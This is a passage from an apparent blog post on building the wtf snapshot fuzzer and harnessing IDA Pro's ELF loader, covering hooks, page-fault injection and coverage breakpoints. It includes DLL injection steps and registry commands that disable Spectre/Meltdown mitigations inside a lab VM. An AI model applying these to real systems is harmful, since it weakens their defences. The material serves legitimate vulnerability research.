  memcpy(ScratchBuffer_.data(), Testcase->Buffer_.get(),
          Testcase->BufferSize_);

  //
  // Mutate in the scratch buffer.
  //

  const size_t TestcaseBufferSize =
      Mutator_->Mutate(ScratchBuffer_.data(), Testcase->BufferSize_,
                        Opts_.TestcaseBufferMaxSize);

  //
  // Copy the testcase in its own buffer before sending it to the
  // consumer.
  //

  TestcaseContent.resize(TestcaseBufferSize);
  memcpy(TestcaseContent.data(), ScratchBuffer_.data(), TestcaseBufferSize);

Detecting context switches

Because we are running an entire OS, we want to avoid spending time executing things that aren't of interest to our purpose. If you are fuzzing ida64.exe you don't really care about executing explorer.exe code. For this reason, we look for cr3 changes thanks to the TlbControlHook callback and stop execution if needed:

void BochscpuBackend_t::TlbControlHook(/*void *Context, */ uint32_t,
                                       uint32_t What, uint64_t NewCrValue) {

  //
  // We only care about CR3 changes.
  //

  if (What != BOCHSCPU_HOOK_TLB_CR3) {
    return;
  }

  //
  // And we only care about it when the CR3 value is actually different from
  // when we started the testcase.
  //

  if (NewCrValue == InitialCr3_) {
    return;
  }

  //
  // Stop the cpu as we don't want to be context-switching.
  //

  BochsHooksDebugPrint("The cr3 register is getting changed ({:#x})\n",
                       NewCrValue);
  BochsHooksDebugPrint("Stopping cpu.\n");
  TestcaseResult_ = Cr3Change_t();
  bochscpu_cpu_stop(Cpu_);
}

Debug symbols

Imagine yourself fuzzing a target with wtf now. You need to write a fuzzer module in order to tell wtf how to feed a test case to your target. To do that, you might need to read some global state to retrieve the offsets of some critical structures. We've built memory access facilities so you can definitely do that, but you have to hardcode addresses. This gets in the way really fast when you are taking different snapshots, porting the fuzzer to a new version of the targeted software, etc.

This was identified early on as a big pain point for the user and I needed a way to not hardcode things that didn't need to be hardcoded. To address this problem, on Windows I use the IDebugClient / IDebugControl COM objects that allow programmatic use of dbghelp and dbgeng features. You can load a crash dump, evaluate and resolve symbols, etc. This is what the Debugger_t class does.
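
As an illustration of what this looks like under the hood, here is a bare-bones dbgeng sketch that resolves a symbol from a crash dump. The COM interfaces and methods are standard dbgeng APIs; the wrapper function itself is mine and leaves out the abstraction and error handling that Debugger_t adds:

// Resolve a symbol (e.g. "nt!PsActiveProcessHead") to an address using a
// kernel crash dump and the dbgeng COM interfaces. Link against dbgeng.lib.
#include <windows.h>
#include <dbgeng.h>

bool ResolveSymbol(const wchar_t *DumpPath, const char *Symbol,
                   ULONG64 &Address) {
  IDebugClient4 *Client = nullptr;
  IDebugControl *Control = nullptr;
  IDebugSymbols *Symbols = nullptr;
  bool Success = false;

  if (FAILED(DebugCreate(__uuidof(IDebugClient4), (void **)&Client))) {
    return false;
  }

  if (SUCCEEDED(Client->QueryInterface(__uuidof(IDebugControl),
                                       (void **)&Control)) &&
      SUCCEEDED(Client->QueryInterface(__uuidof(IDebugSymbols),
                                       (void **)&Symbols))) {

    //
    // Open the crash dump, wait for the engine to finish digesting it, then
    // ask the symbol engine where the symbol lives.
    //

    Success = SUCCEEDED(Client->OpenDumpFileWide(DumpPath, 0)) &&
              SUCCEEDED(Control->WaitForEvent(0, INFINITE)) &&
              SUCCEEDED(Symbols->GetOffsetByName(Symbol, &Address));
  }

  if (Symbols) Symbols->Release();
  if (Control) Control->Release();
  if (Client) Client->Release();
  return Success;
}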

Trace generation

The most annoying thing for me was that execution backends are extremely opaque. It is really hard to see what's going on within them. Actually, if you have ever tried to use whv / kvm APIs you probably ran into the case where the API tells you that you loaded a 'wrong' CPU state. It might be an MSR not configured right, a weird segment descriptor, etc. Figuring out where the issue comes from is both painful and frustrating.

Not knowing what's happening is also annoying when the guest is bug-checking inside the backend. To address the lack of transparency I decided to generate execution traces that I could use for debugging. It is very rudimentary yet very useful to verify that the execution inside the backend is correct. In addition to this tool, you can always modify your module to add strategic breakpoints and dump registers when you want. Those traces are pretty cool because you get to follow everything that happens in the system: from user-mode to kernel-mode, the page-fault handler, etc.

Those traces can also be loaded into lighthouse to analyze the coverage generated by a particular test case.

Crash detection

The last basic block that I needed was user-mode crash detection. I had done some past work in the user exception handler so I kind of knew my way around it. I decided to hook ntdll!RtlDispatchException & nt!KiRaiseSecurityCheckFailure to detect fail-fast exceptions that can be triggered from stack cookie check failure.

Harnessing IDA: walking barefoot into the desert

Once I was done writing the basic features, I started to harness IDA. I knew I wanted to target the loader plugins and based on their sizes as well as past vulnerabilities it felt like looking at ELF was my best chance.

I initially started to harness IDA with its GUI and everything. In retrospect, this was bonkers as I remember handling tons of weird things related to Qt and win32k. After a few weeks of making progress here and there I realized that IDA had a few options to make my life easier:

  • IDA_NO_HISTORY=1 meant that I didn't have to handle as many registry accesses,
  • The -B option allows running IDA in batch-mode from the command line,
  • TVHEADLESS=1 also helped a lot regarding GUI/Qt stuff I was working around.

Some of those options were documented later this year by Igor in this blog post: Igor’s tip of the week #08: Batch mode under the hood.

Inserting test case

After finding those out, it immediately felt like harnessing was possible again. The main problem I had was that IDA reads the input file lazily via fread, fseek, etc. It also reads a bunch of other things like configuration files, the license file, etc.

To be able to deliver my test cases I implemented a layer of hooks that allowed me to pass through file i/o from the guest to my host. This allowed me to read my IDA license keys, the configuration files as well as my input. It also meant that I could sink file writes made to the .id0, .id1, .nam, and all the files that IDA generates that I didn't care about. This was quite a bit of work and it was not really fun work either.

I was not a big fan of this pass-through layer because I was worried that a bug in my code could mean overwriting files on my host or lead to that kind of badness. That is why I decided to replace the pass-through layer with one that reads from memory buffers. During startup, wtf reads the actual files into buffers and the file-system hooks deliver the bytes as needed. You can see this work in fshooks.cc.

This is an example of what this layer allowed me to do:

bool Ida64ConfigureFsHandleTable(const fs::path &GuestFilesPath) {

  //
  // Those files are files we want to redirect to host files. When there is
  // a hooked i/o targeted to one of them, we deliver the i/o on the host
  // by calling the appropriate syscalls and proxy back the result to the
  // guest.
  //

  const std::vector<std::u16string> GuestFiles = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida.key)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\ida.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\noret.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\pe.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\plugins\plugins.cfg)"};

  for (const auto &GuestFile : GuestFiles) {
    const size_t LastSlash = GuestFile.find_last_of(uR"(\)");
    if (LastSlash == GuestFile.npos) {
      fmt::print("Expected a / in {}\n", u16stringToString(GuestFile));
      return false;
    }

    const std::u16string GuestFilename = GuestFile.substr(LastSlash + 1);
    const fs::path HostFile(GuestFilesPath / GuestFilename);

    size_t BufferSize = 0;
    const auto Buffer = ReadFile(HostFile, BufferSize);
    if (Buffer == nullptr || BufferSize == 0) {
      fmt::print("Expected to find {}.\n", HostFile.string());
      return false;
    }

    g_FsHandleTable.MapExistingGuestFile(GuestFile.c_str(), Buffer.get(),
                                         BufferSize);
  }

  g_FsHandleTable.MapExistingWriteableGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id0)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id1)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.nam)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id2)");

  //
  // Those files are files we want to pretend that they don't exist in the
  // guest.
  //

  const std::vector<std::u16string> NotFounds = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida64.int)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\idsnames)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc6.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc9.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\flirt.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\geos.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\linux.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\os2.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win7.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\wince.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\loaders\hppacore.idc)",
      uR"(\??\C:\Users\over\AppData\Roaming\Hex-Rays\IDA Pro\proccache64.lst)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\Latin_1.clt)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\dwarf.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\atrap.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\hpux.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\i960.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\goodname.cfg)"};

  for (const std::u16string &NotFound : NotFounds) {
    g_FsHandleTable.MapNonExistingGuestFile(NotFound.c_str());
  }

  g_FsHandleTable.SetBlacklistDecisionHandler([](const std::u16string &Path) {
    // \ids\pc\api-ms-win-core-profile-l1-1-0.idt
    // \ids\api-ms-win-core-profile-l1-1-0.idt
    // \sig\pc\vc64seh.sig
    // \til\pc\gnulnx_x64.til
    // 6ba8075c8f243566350f741c7d6e9318089add.debug
    const bool IsIdt = Path.ends_with(u".idt");
    const bool IsIds = Path.ends_with(u".ids");
    const bool IsSig = Path.ends_with(u".sig");
    const bool IsTil = Path.ends_with(u".til");
    const bool IsDebug = Path.ends_with(u".debug");
    const bool Blacklisted = IsIdt || IsIds || IsSig || IsTil || IsDebug;

    if (Blacklisted) {
      return true;
    }

    //
    // The parser can invoke ida64!import_module to have the user select
    // a file that gets imported by the binary currently analyzed. This is
    // fine if the import directory is well formated, when it's not it
    // potentially uses garbage in the file as a path name. Strategy here
    // is to block the access if the path is not ASCII.
    //

    for (const auto &C : Path) {
      if (isascii(C)) {
        continue;
      }

      DebugPrint("Blocking a weird NtOpenFile: {}\n", u16stringToString(Path));
      return true;
    }

    return false;
  });

  return true;
}

Although this was probably the most annoying problem to deal with, I had to deal with tons more. I've decided to walk you through some of them.

Problem 1: Pre-load dlls

For IDA to know which loader is the right one to use, it loads all of them and asks them if they know what this file is. Remember that there is no disk when running in wtf, so loading a DLL is a problem.

This problem was solved by injecting the DLLs with inject into IDA before generating the snapshot so that when it loads them it doesn't generate file i/o. The same problem happens with delay-loaded DLLs.

Problem 2: Paged-out memory

On Windows, memory can be swapped out and written to disk into the pagefile.sys file. When somebody accesses memory that has been paged out, the access triggers a #PF which the page fault handler resolves by loading the page back up from the pagefile. But again, this generates file i/o.

I solved this problem for user-mode with lockmem which is a small utility that locks all virtual memory ranges into the process working set. As an example, this is the script I used to snapshot IDA and it highlights how I used both inject and lockmem:

set BASE_DIR=C:\Program Files\IDA Pro 7.5
set PLUGINS_DIR=%BASE_DIR%\plugins
set LOADERS_DIR=%BASE_DIR%\loaders
set PROCS_DIR=%BASE_DIR%\procs
set NTSD=C:\Users\over\Desktop\x64\ntsd.exe

REM Remove a bunch of plugins
del "%PLUGINS_DIR%\python.dll"
del "%PLUGINS_DIR%\python64.dll"
[...]
REM Turning on PH
REM 02000000 Enable page heap (full page heap)
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "GlobalFlag" /t REG_SZ /d "0x2000000" /f
REM This is useful to disable stack-traces
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "PageHeapFlags" /t REG_SZ /d "0x0" /f

REM History is stored in the registry and so triggers cr3 change (when attaching to Registry process VA)
set IDA_NO_HISTORY=1
REM Set up headless mode and run IDA
set TVHEADLESS=1
REM https://www.hex-rays.com/products/ida/support/idadoc/417.shtml
start /b %NTSD% -d "%BASE_DIR%\ida64.exe" -B wtf_input

REM bp ida64!init_database
REM Bump suspend count: ~0n
REM Detach: qd
REM Find process, set ba e1 on address from kdbg
REM ntsd -pn ida64.exe ; fix suspend count: ~0m
REM should break.

REM Inject the dlls.
inject.exe ida64.exe "%PLUGINS_DIR%"
inject.exe ida64.exe "%LOADERS_DIR%"
inject.exe ida64.exe "%PROCS_DIR%"
inject.exe ida64.exe "%BASE_DIR%\libdwarf.dll"

REM Lock everything
lockmem.exe ida64.exe

REM You can now reattach; and ~0m to bump down the suspend count
%NTSD% -pn ida64.exe

Problem 3: Manually soft page-fault in memory from hooks

To insert my test cases in memory I used the file system hook layer I described above, as well as the virtual memory facilities that we talked about earlier. Sometimes, the caller would allocate a memory buffer and call, let's say, fread to read the file into the buffer. When fread was invoked, my hook triggered, and sometimes calling VirtWrite would fail. After debugging and inspecting the state of the PTEs it was clear that the PTE was in an invalid state. This is explained by the fact that memory is lazily paged in on Windows: the page fault handler is expected to be invoked, fix the PTE itself, and let execution carry on. Because we are doing the memory write ourselves, we don't generate a page fault and so the page fault handler never gets invoked.

To solve this, I try to do a virtual to physical translation and inspect the result. If the translation is successful it means the page tables are in a good state and I can perform the memory access. If it is not, I insert a page fault in the guest and resume execution. When execution restarts, the page fault handler runs, fixes the PTE, and returns execution to the instruction that was executing before the page fault. Because we have our hook there, we get reinvoked a second time but this time the virtual to physical translation works and we can do the memory write. Here is an example in ntdll!NtQueryAttributesFile:

if (!g_Backend->SetBreakpoint(
        "ntdll!NtQueryAttributesFile", [](Backend_t *Backend) {
          // NTSTATUS NtQueryAttributesFile(
          //  _In_  POBJECT_ATTRIBUTES      ObjectAttributes,
          //  _Out_ PFILE_BASIC_INFORMATION FileInformation
          //);
          // ...
          //
          // Ensure that the GuestFileInformation is faulted-in memory.
          //

          if (GuestFileInformation &&
              Backend->PageFaultsMemoryIfNeeded(
                  GuestFileInformation, sizeof(FILE_BASIC_INFORMATION))) {
            return;
          }

Problem 4: KVA shadow

When I snapshot IDA the CPU is in user-mode but some of the breakpoints I set up are on functions living in kernel-mode. To be able to set a breakpoint on those, wtf simply does a VirtTranslate and modifies physical memory with an int3 opcode. This is exactly what KVA Shadow prevents: the user @cr3 doesn't contain the part of the page tables that describe kernel-mode (only a few stubs) and so there is no valid translation.
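To make the mechanism concrete, here is a minimal sketch of what planting such a breakpoint boils down to (and where it breaks under KVA shadow); the VirtTranslate signature below is a hypothetical stand-in used purely for illustration, this is not wtf's actual code:

//
// Minimal sketch: plant a breakpoint by patching guest RAM directly. The
// VirtTranslate signature below is hypothetical and only used for
// illustration.
//

bool SetBreakpointByPatchingRam(const Gva_t Gva) {
  //
  // Translate the GVA into a GPA using the current @cr3. With KVA shadow on
  // and a user-mode @cr3, kernel GVAs have no valid translation and this
  // step fails.
  //

  Gpa_t Gpa;
  if (!VirtTranslate(Gva, Gpa)) {
    return false;
  }

  //
  // Find the host virtual address backing the GPA and write an int3 opcode.
  //

  uint8_t *Hva = PhysTranslate(Gpa);
  *Hva = 0xcc;
  return true;
}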

To solve this I simply disabled KVA shadow with the below edits in the registry:

REM To disable mitigations for CVE-2017-5715 (Spectre Variant 2) and CVE-2017-5754 (Meltdown)
REM https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f

Problem 5: Identifying bottlenecks

While developing wtf I allocated time to profile the tool under specific workloads with the Intel VTune Profiler, which is now free. If you have never used it, you really should as it is both absolutely fascinating and really useful. If you care about performance, you need to measure to understand better where you can have the most impact. Not measuring is a big mistake because you will most likely spend time changing code that might not even matter. If you try to optimize something you should also be able to measure the impact of your change.

For example, below is the VTune hotspot analysis report for the following invocation:

wtf.exe run --name hevd --backend whv --state targets\hevd\state --runs=100000 --input targets\hevd\crashes\crash-0xfffff764b91c0000-0x0-0xffffbf84fb10e780-0x2-0x0

[Figure: VTune hotspot analysis report]

This report is really catastrophic because it means we spend twice as much time dealing with memory access faults as actually running target code. Handling memory access faults should take very little time. If anybody knows their way around whv & performance, it'd be great if you could reach out because I really have no idea why it is that slow.

The birth of hope

After tons of work, I could finally execute the ELF loader from start to end and see the messages you would see in the output window. Below, you can see IDA loading the elf64.dll loader, then initializing the database as well as the btree. Then, it loads up processor modules, creates segments, processes relocations, and finally loads the dwarf modules to parse debug information:

>wtf.exe run --name ida64-elf75 --backend whv --state state --input ntfs-3g
Initializing the debugger instance.. (this takes a bit of time)
Parsing coverage\dwarf64.cov..
Parsing coverage\elf64.cov..
Parsing coverage\libdwarf.cov..
Applied 43624 code coverage breakpoints
[...]
Running ntfs-3g
[...]
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\loaders\elf64.dll)
ida64: ida64!msg(format="Possible file format: %s (%s) ", ...)
ida64: ELF64 for x86-64 (Shared object) - ELF64 for x86-64 (Shared object)
[...]
ida64: ida64!msg(format="   bytes   pages size description --------- ----- ---- -------------------------------------------- %9lu %5u %4u allocating memory for b-tree... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for virtual array... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for name pointers... ----------------------------------------------------------------- %9u
total memory allocated  ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k064.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k0s64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\ad218x64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\alpha64.dll)
[...]
ida64: ida64!msg(format="Loading file '%s' into database... Detected file format: %s ", ...)
ida64: ida64!msg(format="Loading processor module %s for %s...", ...)
ida64: ida64!msg(format="Initializing processor module %s...", ...)
ida64: ida64!msg(format="OK ", ...)
ida64: ida64!mbox(format="@0:1139[] Can't use BIOS comments base.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: ida64!msg(format="Autoanalysis subsystem has been initialized. ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
[...]
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Reading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Loading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="", ...)
ida64: ida64!msg(format="Processing relocations... ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!mbox(format="Unexpected entries in the PLT stub. The file might have been modified after linking.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: Unexpected entries in the PLT stub.
The file might have been modified after linking.
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
[...]
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dbg64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dwarf64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\libdwarf.dll)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="Plugin "%s" not found ", ...)
ida64: Hit the end of load file :o

Need for speed: whv backend

At this point, I was able to fuzz IDA but the speed was incredibly slow: I could execute about 0.01 test cases per second. It was really cool to see it working, finding new code coverage, etc., but I felt I wouldn't find much at this speed. That's why I decided to look at using whv to implement an execution backend.

I had played around with whv before with pywinhv so I knew the features offered by the API well. As this was the first execution backend using virtualization I had to rethink a bunch of the fundamentals.

Code coverage

What I settled on is using one-time software breakpoints at the beginning of basic blocks. The user simply needs to generate a list of breakpoint addresses into a JSON file and wtf consumes this file during initialization. This means that the user can selectively pick the modules that they want coverage for.

It is annoying though because it means you need to throw those modules in IDA and generate the JSON file for each of them. The script I use for that is available here: gen_coveragefile_ida.py. You could obviously generate the file yourself via other tools.

Overall I think it is a good enough tradeoff. I did try to play with more creative & esoteric ways to acquire code coverage though, like filling the address space with int3s and lazily populating code using a length-disassembler engine to figure out instruction sizes. I loved this idea but I ran into tons of problems with switch tables that embed data in code sections: wtf corrupts them when setting software breakpoints, which leads to spectacular crashes a little bit everywhere in the system, so I abandoned the idea. The trap flag was awfully slow, and whv doesn't expose the Monitor Trap Flag.

The ideal for me would be to find a way to conserve the performance and acquire code coverage without knowing anything about the target, like in bochscpu.

Dirty memory

The other thing that I needed was to be able to track dirty memory. whv provides WHvQueryGpaRangeDirtyBitmap to do just that which was perfect.

Tracing

One thing that I would have loved was to be able to generate execution traces like with bochscpu. I initially thought I'd be able to mirror this functionality using the trap flag. But if you turn on the trap flag before, let's say, a syscall instruction, the fault gets raised only after the instruction completes and so you miss the entire kernel side executing. I discovered that this is due to how syscall is implemented: it masks RFLAGS with the IA32_FMASK MSR, stripping away the trap flag. After programming IA32_FMASK myself I could trace through syscalls, which was great. By comparing traces generated by the two backends, I noticed that the whv trace was missing page faults. This is basically another instance of the same problem: when an interruption happens, the CPU saves the current context and loads a new one from the task segment which doesn't have the trap flag. I can't remember if I got that working or if this turned out to be harder than it looked, but I ended up reverting the code and settled for only generating code coverage traces. It is definitely something I would love to revisit in the future.
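For reference, keeping the trap flag alive across syscall boils down to clearing TF (bit 8 of RFLAGS) from the IA32_FMASK MSR (0xC0000084). Below is a minimal sketch of the idea; GetMsr / SetMsr are hypothetical helpers, not wtf's actual API:

//
// Minimal sketch: syscall clears every RFLAGS bit that is set in IA32_FMASK,
// so removing TF from the mask keeps single-stepping alive on the kernel
// side. GetMsr / SetMsr are hypothetical helpers used for illustration only.
//

constexpr uint32_t MsrIa32Fmask = 0xc0000084;
constexpr uint64_t RflagsTf = 1ULL << 8;

void KeepTrapFlagAcrossSyscalls() {
  const uint64_t Fmask = GetMsr(MsrIa32Fmask);
  SetMsr(MsrIa32Fmask, Fmask & ~RflagsTf);
}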

Timeout

To protect the fuzzer against infinite loops and to limit the execution time, I use a timer to tell the virtual processor to stop execution. This is also not as good as what bochscpu offered us because it is not as precise, but that's the only solution I could come up with:

class TimerQ_t {
  HANDLE TimerQueue_ = nullptr;
  HANDLE LastTimer_ = nullptr;

  static void CALLBACK AlarmHandler(PVOID, BOOLEAN) {
    reinterpret_cast<WhvBackend_t *>(g_Backend)->CancelRunVirtualProcessor();
  }

public:
  ~TimerQ_t() {
    if (TimerQueue_) {
      DeleteTimerQueueEx(TimerQueue_, nullptr);
    }
  }

  TimerQ_t() = default;
  TimerQ_t(const TimerQ_t &) = delete;
  TimerQ_t &operator=(const TimerQ_t &) = delete;

  void SetTimer(const uint32_t Seconds) {
    if (Seconds == 0) {
      return;
    }

    if (!TimerQueue_) {
      TimerQueue_ = CreateTimerQueue();
      if (!TimerQueue_) {
        fmt::print("CreateTimerQueue failed.\n");
        exit(1);
      }
    }

    if (!CreateTimerQueueTimer(&LastTimer_, TimerQueue_, AlarmHandler,
                                nullptr, Seconds * 1000, Seconds * 1000, 0)) {
      fmt::print("CreateTimerQueueTimer failed.\n");
      exit(1);
    }
  }

  void TerminateLastTimer() {
    DeleteTimerQueueTimer(TimerQueue_, LastTimer_, nullptr);
  }
};
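For context, this is roughly how the timer is meant to be used around a run; RunVirtualProcessorUntilExit is a hypothetical placeholder name:

//
// Rough usage sketch: arm the timer before entering the virtual processor
// and disarm it once the test case is done. RunVirtualProcessorUntilExit is
// a hypothetical placeholder.
//

TimerQ_t Timer;

bool RunTestCaseWithTimeout(const uint32_t TimeoutSeconds) {
  Timer.SetTimer(TimeoutSeconds);
  const bool Ok = RunVirtualProcessorUntilExit();
  Timer.TerminateLastTimer();
  return Ok;
}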

Inserting page faults

To be able to insert a page fault into the guest I use the WHvRegisterPendingEvent register and a WHvX64PendingEventException event type:

bool WhvBackend_t::PageFaultsMemoryIfNeeded(const Gva_t Gva,
                                            const uint64_t Size) {
  const Gva_t PageToFault = GetFirstVirtualPageToFault(Gva, Size);

  //
  // If we haven't found any GVA to fault-in then we have no job to do so we
  // return.
  //

  if (PageToFault == Gva_t(0xffffffffffffffff)) {
    return false;
  }

  WhvDebugPrint("Inserting page fault for GVA {:#x}\n", PageToFault);

  // cf 'VM-Entry Controls for Event Injection' in Intel 3C
  WHV_REGISTER_VALUE_t Exception;
  Exception->ExceptionEvent.EventPending = 1;
  Exception->ExceptionEvent.EventType = WHvX64PendingEventException;
  Exception->ExceptionEvent.DeliverErrorCode = 1;
  Exception->ExceptionEvent.Vector = WHvX64ExceptionTypePageFault;
  Exception->ExceptionEvent.ErrorCode = ErrorWrite | ErrorUser;
  Exception->ExceptionEvent.ExceptionParameter = PageToFault.U64();

  if (FAILED(SetRegister(WHvRegisterPendingEvent, &Exception))) {
    __debugbreak();
  }

  return true;
}

Determinism

The last feature that I wanted was to try to get as much determinism as I could. After tracing a bunch of executions I realized that nt!ExGenRandom, in the Windows kernel, uses rdrand and that this was a big source of non-determinism across executions. Intel does support generating a vmexit when the instruction is executed, but this is also not exposed by whv.

I settled for putting a breakpoint on the function and emulating its behavior with a deterministic implementation:

//
// Make ExGenRandom deterministic.
//
// kd> ub fffff805`3b8287c4 l1
// nt!ExGenRandom+0xe0:
// fffff805`3b8287c0 480fc7f2        rdrand  rdx
const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4);
if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) {
      DebugPrint("Hit ExGenRandom!\n");
      Backend->Rdx(Backend->Rdrand());
    })) {
  return false;
}

I am not a huge fan of this solution because it means you need to know where non-determinism is coming from, which is usually hard to figure out in the first place. Another source of non-determinism is the timestamp counter. As far as I can tell, this hasn't led to any major issues so far, but it might bite us in the future.

With the above implemented, I was able to run test cases through the backend end to end which was great. Below I describe some of the problems I solved while testing it.

Problem 6: Code coverage breakpoints not free

Profiling wtf revealed that the code coverage breakpoints I thought were free were not quite that free. In theory they are one-time breakpoints, so you pay their cost only once. This leads to a warm-up cost at the start of the run, while the fuzzer is discovering the highly reachable sections of code, but over time it should become negligible.

The problem in my implementation was in the code used to restore those breakpoints after executing a test case. I tracked the code coverage breakpoints that hadn't been hit yet in a list. When restoring, I would start by restoring every dirty page and then I would iterate through this list to reset the code coverage breakpoints. It turns out this is highly inefficient when you have hundreds of thousands of breakpoints.

I did what you usually do when you have a performance problem: I traded memory for CPU time. The answer to this problem is the Ram_t class. The way it works is that every time you add a code coverage breakpoint, it duplicates the page and sets the breakpoint both in this copy and in the guest RAM.

//
// Add a breakpoint to a GPA.
//

uint8_t *AddBreakpoint(const Gpa_t Gpa) {
  const Gpa_t AlignedGpa = Gpa.Align();
  uint8_t *Page = nullptr;

  //
  // Grab the page if we have it in the cache
  //

  if (Cache_.contains(Gpa.Align())) {
    Page = Cache_.at(AlignedGpa);
  }

  //
  // Or allocate and initialize one!
  //

  else {
    Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
    if (Page == nullptr) {
      fmt::print("Failed to call aligned_alloc.\n");
      return nullptr;
    }

    const uint8_t *Virgin =
        Dmp_.GetPhysicalPage(AlignedGpa.U64()) + AlignedGpa.Offset().U64();
    if (Virgin == nullptr) {
      fmt::print(
          "The dump does not have a page backing GPA {:#x}, exiting.\n",
          AlignedGpa);
      return nullptr;
    }

    memcpy(Page, Virgin, Page::Size);
  }

  //
  // Apply the breakpoint.
  //

  const uint64_t Offset = Gpa.Offset().U64();
  Page[Offset] = 0xcc;
  Cache_.emplace(AlignedGpa, Page);

  //
  // And also update the RAM.
  //

  Ram_[Gpa.U64()] = 0xcc;
  return &Page[Offset];
}

When a code coverage breakpoint is hit, the class removes the breakpoint from both of those locations.

//
// Remove a breakpoint from a GPA.
//

void RemoveBreakpoint(const Gpa_t Gpa) {
